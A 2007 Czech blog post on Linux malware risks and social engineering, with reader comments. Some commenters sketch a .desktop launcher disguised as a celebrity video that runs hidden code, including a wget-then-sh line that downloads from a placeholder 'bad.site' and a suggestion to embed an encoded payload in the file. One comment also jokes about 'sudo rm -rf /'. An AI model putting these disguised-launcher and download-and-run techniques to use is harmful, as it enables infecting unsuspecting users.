abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 20:22 | Nová verze

    Byla vydána (𝕏) květnová aktualizace aneb nová verze 1.101 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a videi v poznámkách k vydání. Ve verzi 1.101 vyjde také VSCodium, tj. komunitní sestavení Visual Studia Code bez telemetrie a licenčních podmínek Microsoftu.

    Ladislav Hagara | Komentářů: 0
    dnes 10:00 | Komunita

    V Brně na FIT VUT probíhá třídenní open source komunitní konference DevConf.CZ 2025. Vstup je zdarma, nutná je ale registrace. Na programu je celá řada zajímavých přednášek, lightning talků, meetupů a workshopů. Přednášky lze sledovat i online na YouTube kanálu konference. Aktuální dění lze sledovat na Matrixu, 𝕏 nebo Mastodonu.

    Ladislav Hagara | Komentářů: 0
    dnes 09:44 | IT novinky

    Vyloučení technologií, které by mohly představovat bezpečnostní riziko pro stát, má umožnit zákon o kybernetické bezpečnosti, který včera Senát schválil spolu s novelami navazujících právních předpisů. Norma, kterou nyní dostane k podpisu prezident, počítá rovněž s prověřováním dodavatelů technologií pro stát. Normy mají nabýt účinnosti od třetího měsíce po jejich vyhlášení ve Sbírce zákonů.

    Ladislav Hagara | Komentářů: 9
    dnes 01:11 | Nová verze

    Open source platforma Home Assistant (Demo, GitHub, Wikipedie) pro monitorování a řízení inteligentní domácnosti byla vydána v nové verzi 2025.6.

    Ladislav Hagara | Komentářů: 0
    dnes 00:55 | Nová verze

    Po Red Hat Enterprise Linuxu a AlmaLinuxu byl v nové stabilní verzi 10.0 vydán také Rocky Linux. Přehled novinek v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    včera 22:55 | Nová verze

    Bylo vydáno Eclipse IDE 2025-06 aneb Eclipse 4.36. Představení novinek tohoto integrovaného vývojového prostředí také na YouTube.

    Ladislav Hagara | Komentářů: 0
    včera 22:33 | IT novinky

    Americká filmová studia Walt Disney a Universal Pictures podala žalobu na provozovatele populárního generátoru obrázků pomocí umělé inteligence (AI) Midjourney. Zdůvodňují to údajným porušováním autorských práv. V žalobě podané u federálního soudu v Los Angeles označují firmu za „bezednou jámu plagiátorství“, neboť podle nich bez povolení bezostyšně kopíruje a šíří postavy z filmů jako Star Wars, Ledové království nebo Já, padouch, aniž by do nich investovala jediný cent.

    Ladislav Hagara | Komentářů: 1
    včera 18:33 | IT novinky

    Ultra Ethernet Consortium (UEC), jehož cílem je optimalizace a další vývoj Ethernetu s důrazem na rostoucí síťové požadavky AI a HPC, vydalo specifikaci Ultra Ethernet 1.0 (pdf, YouTube).

    Ladislav Hagara | Komentářů: 0
    včera 13:00 | IT novinky

    Francouzský prezident Emmanuel Macron chce zakázat přístup na sociální sítě pro děti do 15 let. Francie podle něj tento krok udělá sama do několika měsíců, i pokud se na něm neshodnou další státy Evropské unie. Reaguje tak na úterní vraždu vychovatelky, kterou ve východofrancouzském městě Nogent pobodal 14letý mladík. Jednotlivé sociální sítě podle něj mají možnost věk ověřit a vymáhat zákaz pomocí systémů na rozpoznávání tváří.

    Ladislav Hagara | Komentářů: 12
    včera 05:11 | IT novinky

    Byl aktualizován seznam 500 nejvýkonnějších superpočítačů na světě TOP500. Nejvýkonnějším superpočítačem zůstává El Capitan od HPE (Cray) s výkonem 1,742 exaFLOPS. Druhý Frontier má výkon 1,353 exaFLOPS. Třetí Aurora má výkon 1,012 exaFLOPS. Nejvýkonnější český počítač C24 klesl na 165 místo. Karolina, GPU partition klesla na 195. místo a Karolina, CPU partition na 421. místo. Další přehledy a statistiky na stránkách projektu.

    Ladislav Hagara | Komentářů: 0
    Jaký je váš oblíbený skriptovací jazyk?
     (55%)
     (31%)
     (7%)
     (2%)
     (0%)
     (1%)
     (3%)
    Celkem 255 hlasů
     Komentářů: 16, poslední 8.6. 21:05
    Rozcestník

    Linuxové viry a podobná verbež

    27.4.2007 13:34 | Přečteno: 3411× | Linux | poslední úprava: 27.4.2007 13:46

    Poté, co pan Kaspersky na root.cz pronesl, že počet virů bude stoupat s nárůstem uživatelů Linuxu, strhla se vlna příspěvků, které ho odsoudili. Jenže, je (a bude) Linux a především jeho uživatelé v bezpečí?

    předehra: Terminologický guláš

    Význam slova (počítačový) vir prošel časem jistou proměnou. Za dávných časů MS-DOSu existovaly viry jako OneHalf, Pieczk, které napadaly bootsektory disket, rezidentně se schovávaly v paměti a chovaly se polymorfně. Všeobecně to byly velmi sofistikované kusy kódu, navíc s destruktivními účinky.

    Ovšem doba pokročila. Dnes se běžně pod pojem vir schová spyware, červ, nebo jakýkoli jiný, zákeřný kód zhusta vygenerovaný nějakým scriptkiddie ve VisualBasicu. Odborníci sice protestují a používají termíny přesně, ale jsou v přesile (a koneckonců máme demokracii :-D) a je to častem zdrojem nedorozumění.

    Doba změnila i účel těchto aplikací. Místo destruktivní činnosti se zaměřují na posílání spamů, sledování uživatele, zobrazování reklam, nebo obecně slouží jako jednotka v nějakém tom botnetu

    Takže pojmem vir obecně označuje libovolný škodlivý kód a já ho budu v tomto významu používat i nadále.

    Způsoby šíření

    Mnoho virů se šíří automaticky kdysi po disketách, dnes po síti. Ovšem trojské koně, nebo spyware, je často součástí nějaké aplikace. Nástupu ILOVEYOU ukázal, že místo složitých technik je jednodušší prostě použít sociálního inženýrství a nechat uživatele, ať si kód posílejí sami.

    Serverové a systémové nebezpečí

    Klasické viry typu OneHalf - vůči nim je Linux díky svojí unixové architektuře odolný. Systém oddělených práv v kombinaci s aktualizovaným systémem a velkou heterogenitou těchto systémů neumožňují psát viry, které by se mohly víc šířit - seznam linuxových virů

    Červy - jsou velice podobné virům, ale klasicky se takto označují ty programy, které se šíří prostřednictvím sítě. Unixové systémy nejsou proti těmto útokům odolné, ale rychlé bezpečnostní aktualizace spolu s velkou heterogenitou nedávají těmto potvůrkám velkou šanci. Navíc, útoky jsou vesměs vedeny proti známým děravým programům typu ftp servery, nebo bind, které proto mnozí správci ponechávají v chrootu.

    Z hlediska správce serveru jsou tyto útoky významné, z hlediska desktopového uživatele už méně (pokud si aktualizuje distribuci, je téměř bez šance mu nakazit systém)

    Desktopové nebezpečí

    Na desktopu v současnosti používají Linux vesměs geekové, takže vytvářet ILOVEOYU.sh je úplně zbytečné, protože si to nikdo nespustí. Jenže, pokud jej bude používat každá sekretářka, bude se ILOVEYOU.sh spouštět i tam. Jediným rozdílem je, že je na Linuxu řádově složitější takový program spustit, ale v momentě, kdy bude v emailu od kamarádky napsaný návod, pravděpodobnost spuštění vzroste.

    Navíc, každý správný unix nabízí dostatek prostoru pro oběšení uživatele. Takové KDE se svým DCOPem nabízí takové možnosti, nad nimiž by se bastličům ve VBS asi protočily panenky. Jakmile nastoupí DBUS, bude mít každý vir, který nějak uživatele donutí, aby jej spustil, prakticky ráj na zemi. Prohlížeče pravidelně ukazující zadané weby, dialogová okna s reklamou, a kdo ví, co všechno tyto lidi napadne.

    Závěr

    Linux jako systém je vůči škodlivému kódu odolný. Nemusíme se bát automaticky spouštěných příloh, nebo naboření systému. Máme balíčky, máme unixovou architekturu, atd. A v současnosti je většina linuxáků počítačovými odborníky, co nespouštějí každou blbost.

    Ovšem na co dnes rozhodně není nikdo připraven je situace, až začnou negeekům chodit emaily typu

    To view naked Paris Hilton, save an attachment and type 'sh paris_naked.sh'
    a budou volat vás, kteří budete budete muset počítač od toho nějak vyčistit (a poslouchat řeči "vždyť jsi říkal, že na tom Linuxu nemají být viry"). A před neznalostí/hloupostí uživatele nedokáže chránit žádný systém (který by šlo zároveň používat).

           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    27.4.2007 13:38 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ještě jeden odporník a udělám z tebe fajnovou (leč jenom na jedno použití) součástku T3 :-P (v dobré náladě možná nějaké modernizované verze)
    27.4.2007 13:46 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    V tomto případě to být jen překlep :-D
    When your hammer is C++, everything begins to look like a thumb.
    27.4.2007 13:49 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Jó… kdo s čím zachází, tím také schází!
    27.4.2007 17:50 David Jaša | skóre: 44 | blog: Dejvův blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ano, tam jsou místo univerzálních odporníků pouze brzdové. :-)
    27.4.2007 18:10 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Správně, takže rozjezd přežije.
    27.4.2007 13:44 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Lepší je sh paris-hilton.wmv.

    Ale nejlepší bude, použít takové ty .desktop soubory (z ~/Desktop), protože lidi si často ukládají věci na plochu. Ty mají samozřejmě i položku Exec...
    27.4.2007 13:45 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Což. Ono vůbec obecně. Celý svět má tendenci stát se spustitelným kódem což je právě noční můra každého bezpečnobubla.
    27.4.2007 13:50 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    No vidíš, ze mě sociální inženýr asi nebude :-)
    When your hammer is C++, everything begins to look like a thumb.
    27.4.2007 14:30 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ono to fakt není marné, firefox implicitně ukládá na plochu, může to mít ikonku jako video, Name=parishilton.wmv, možná by to v nějaké položce mohlo nést i data (to video). Takže když se na to klikne, spustí se ošklivá akce, pak se rozbalí na plochu soubor s videem, smaže se .desktop soubor, spustí se video v přehrávači...
    27.4.2007 15:42 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Koneckonců, v akci může být wget "http://bad.site/virus -O /tmp/virus"; sh /tmp/virus ...
    When your hammer is C++, everything begins to look like a thumb.
    27.4.2007 16:01 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    To jistě může, ale pak je to závislé na funkčnosti bad.site nebo jiné metodě jak ten zlý skript získávat. Lepší by bylo, kdyby to fungovalo i offline. Myslím, že by stačilo použít nějakou položku (položky), která není ve specifikaci, to jsou ty "X-" a do nich vložit (třeba uuencodovaná) data. Příkaz v Exec by měl za úkol rozbalit data a spustit škodlivý kód.
    David Heidelberg avatar 27.4.2007 13:57 David Heidelberg | skóre: 46 | blog: blog_
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Přemýšleli jste někdy o tom co by se stalo kdyby nebyly viry(a spyware atd.)? To by nám potom asi Symantec a další firmy zkrachovaly :-D

    Někdy přemýšlím, jestli náhodou sami neplatí za vývoj(nebo nevyvyjí) virů :-D , aby si každý musel koupit jejich skvělý produkt který ochrání jeho počítač :-D

    0K1AS

    PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exe které člověk si nestahnul z ověřených zdrojů. Samozřejmě i tak je dobré jednou za pl roku to něčím zkontrolovat, ale po 2 letech jsem nepotkal ani virus. :-)
    27.4.2007 14:06 xkesh | skóre: 46 | blog: eXtempore
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exe
    Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude. Dokonce obchody nabízely (nevím jestli u nás, ale v Německu ano) k nedávno prodaným počítačům CD s aktualizací a pomocným programem.
    xxx avatar 27.4.2007 14:09 xxx | skóre: 42 | blog: Na Kafíčko
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    JJ, stačila jedna záplata od Moftu. Taková veselá hříčka :-).
    Please rise for the Futurama theme song.
    David Heidelberg avatar 27.4.2007 14:10 David Heidelberg | skóre: 46 | blog: blog_
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    tak samozřejmě jsem nepoužíval IE :-D , ale FireFox
    27.4.2007 15:15 Václav HFechs Švirga | skóre: 26 | blog: HF | Kopřivnice
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Se SP1 ti to nepomohlo, stačilo mít neaktualizovaný windows (po čisté instalaci do 10 minut, vlastní zkušenost, blbě se to stíhá) a veřejnou IP adresu... Žádny prohlížeč jsi nemusel pustit. Ale samozřejmě že firewall je základ, s ním můžeš mít windows i bez antiviru.
    Baník pyčo!
    Luk avatar 27.4.2007 14:47 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ano, to byl to msblaster. Také jsem tehdy chytil tuhle potvoru, měl jsem tehdy z nějakého důvodu ve Windows odstavený firewall (což se ukázalo jako klíčová věc). Ale tenhle červ se dal (v první chvíli, bez informací, o co jde) docela úspěšně eliminovat tím, že se jeho EXE soubor přepsal nějakým jiným (třeba prázdným). Červ pak sice přes port 135 nakoukl do systému, ale když zjistil přítomnost daného souboru, jeho činnost tím skončila.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    clipper avatar 27.4.2007 15:37 clipper | skóre: 23 | blog: Nic než tohle
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Jojo, to byl ten, který mne tak štval až jsem přešel na Linux. :-)
    Když selžou všechny pokusy uvést zařízení do provozu, je dobré přečíst si návod.
    27.4.2007 20:40 _____ | skóre: 5 | blog: Poznámky
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude.
    To je ta méně závažná polovina. Ve skutečnosti je tato díra zajímavější tím, že na ni existoval Windows exploit jak pro script kiddie, kam stačilo zadat pouze cílovou IP adresu a vyskočil vzdálený příkazový řádek. Jmenovalo se to nějak na způsob DCOM RPC Exploit by DarkSideOfKalez.

    A tomu restartu šlo zabránit nějakým přepínačem od shutdown, tuším shutdown /k nebo shutdown /i.
    xxx avatar 27.4.2007 14:07 xxx | skóre: 42 | blog: Na Kafíčko
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Naprosto souhlasím. Poslední "vir", který jsem na Windows poznal, byl ILY. Jsem ho spustil, abych se podíval jak funguje :-). Firmy jak Symantec apod. nevydělavají díky nějakým zkušeným haxourům, kteří píší sofistikované viry, ale vydělávají jen a pouze na blbosti uživatelů.
    Please rise for the Futurama theme song.
    27.4.2007 14:02 xkesh | skóre: 46 | blog: eXtempore
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Jenže, je (a bude) Linux a především jeho uživatelé v bezpečí?

    Je zajímavé, že se diskutují a připouštějí jakési "viry" pro linuxové systémy, ale zatím nějak nepozoruji, že by se i proti těm hypotetickým plánoval nějaký "antivirák" - a hlavně, jak by asi v Linuxu pracoval - pro každou distribuci zvlášť?
    27.4.2007 14:14 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Proč by měl. Antivirus není ze strategického pohledu zajímavý, nejde o systémové řešení a nese to tunu problémů.
    Shadow avatar 27.4.2007 14:46 Shadow | skóre: 25 | blog: Brainstorm
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Antivirák (alespoň klasický) už dávno máme - clamav.
    If we do not believe in freedom of speech for those we despise we do not believe in it at all.
    Luk avatar 27.4.2007 14:54 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    ClamAV se výborně hodí pro kontrolu pošty na serveru, ale na desktop jako klasický antivir se nehodí. Je pomalý a pro použití jako on-access scanner ("rezidentní štít") vyžaduje některou z metod integrace do systému (modul Dazuko, AVFS, ClamFS apod.), což není triviální a zatím to snad v žádné distribuci není připraveno.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    teekey avatar 27.4.2007 15:00 teekey | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    to se bohuzel tyka vsech OS, nejkrytictejsi misto je uzivatel :(
    27.4.2007 16:50 Bubak | skóre: 16 | blog: Čtvrtá cenová
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Zkus si kazdy vyskyt slovicka "vir" v textu nahradit prelozenym "muz", pripadne "manzel":-).

    Jinak hezky sepsane.
    ... máš jen mrtvou kočku a poškrábanýho jezevčíka ...
    27.4.2007 20:52 _____ | skóre: 5 | blog: Poznámky
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Cože? Že viry v Linuxu neexistují? Zkusil sis někdy spustit nějaký pod Wine? :-)
    2.5.2007 19:38 Petr "Glubo" Sýkora | skóre: 21 | blog: Glubnik
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež

    Zkusil, většinou segfaultovaly, nebo na něčem spadly, ale pár se jich zdálo spustitelných. ;)

    „O mrtvých jen v dobrém." „Pojďme se bavit o Stalinovi."
    28.4.2007 10:23 Jiří Jakeš | skóre: 22 | blog: Linuxovna_JJ | Taipei
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Často ukazuji seznam zaznamenaných virů za poslední rok. Jsou tam jen dva viry označené slovíčkem Linux. Ten lepší z nich nakazil jeden počítač ze dvou miliard, ten druhý ze čtyř…
    28.4.2007 11:01 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    No to ano, protože viry (v klasickém slova významu) a červy mají na Linuxu opravdu velké potíže s přežitím a do stádia ostatních, řekněme uživatelských druhů, virů se Linux ještě nedostal.

    Počet lidí, kteří je umí napsat je malý (takže návratnost je mizivá) a vesměs se jedná o lidi, kteří unixu fandí. Navíc je tu sociální inženýrství složité, pokud mi dojde mail s přílohou Paris.Hilton.desktop (sh, py, pl, ...) tak to poslední, co udělám je, že na to kliknu, dokud nezjistím, o co jde :-) Takto se asi zachová většina uživatelů.

    Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni? ;-)
    When your hammer is C++, everything begins to look like a thumb.
    28.4.2007 11:04 xkesh | skóre: 46 | blog: eXtempore
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni? ;-)
    Pak Linux zvítězil :-D
    29.5.2007 22:27 tomfi | skóre: 19
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Sory že to oživuji po takovém čase :)

    Já nevím, ale ze systémového hlediska byla problematika virů vyřešena na většině operačních systémech té doby v 90 letech kdy se zjistilo že je to chyba :) .... microsoft jako jediný nereagoval, a od té doby se objevují pověsti o tom, že windows obsahují viry protože jsou nejrozšířenější.

    Pravdou zůstává, že antivirové firmy se chytli díky jednomu jedinýmu viru a díky super propagaci ( zase odkazuji na historii, jde o to že vytvořili pocit nebezpečí pomocí kvalitní kampaně na kterou skočili snad všechna média a od té doby začali vydělávat... do té doby to byla taková hodně okrajová a poměrně nevýdělečná oblast IT ;) )

    Velice rád bych viděl nehipotetickej "virus" na linuxu .... něco co se samo šíří, škodí... možná by stačilo něco co škodí bez přičinění uživatele ... nemyslím věc typu:Ahoj jsem somálský virus: napiš do konzole: sudo rm -rf / ....

    Problém s ideiologií vytvářenou na základě toho, že by něco MOHlo vzniknout je opravdu hipotetický, nejde o variabilitu, ale o způsob řešení problému. Pokud by takový virus vzniknul tak velice rychle by byla vytvořena oprava chyby, chyby že vůbec virus funguje!!!
    Vždyť jsou to jen jedničky a nuly ...
    12.10.2007 01:11 Honza
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Troufám si tvrdit, že narozdíl od většiny uživatelů Linuxu, jsem na architekturu založenou na Windows jedním z velice erudovaných odborníků, takovým, o jakém se bastličům na linuxu ani nezdá. VBS skript je programovací jazyk, na který se nějaký PERL nebo PHP nedotáhne ani za 20 let. Moc se to neví, v linuxové komunitě obzvlášť, ale pomocí skriptů VBS je např. možné velice jednoduše a efektivně spravovat jakákoliv konta v Active Directory - centrálním systému uložení doménových kont - tedy nejlepším možném způsobu uložení kont. VBS umí věci, o kterých se dětem hrajícím si s linuxem (linux je systém pro děti), ani nesní. Ale co čekat od linuxových amatérů, kteří v životě neviděli Windows Server, že? Takový linuxák umí pouze hloupě pindat.
    5.7.2011 22:49 Linuxátor
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    xD :D !!!! sudo kill all windows & sudo apt-get install linux & sudo apt-get update ... xD

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.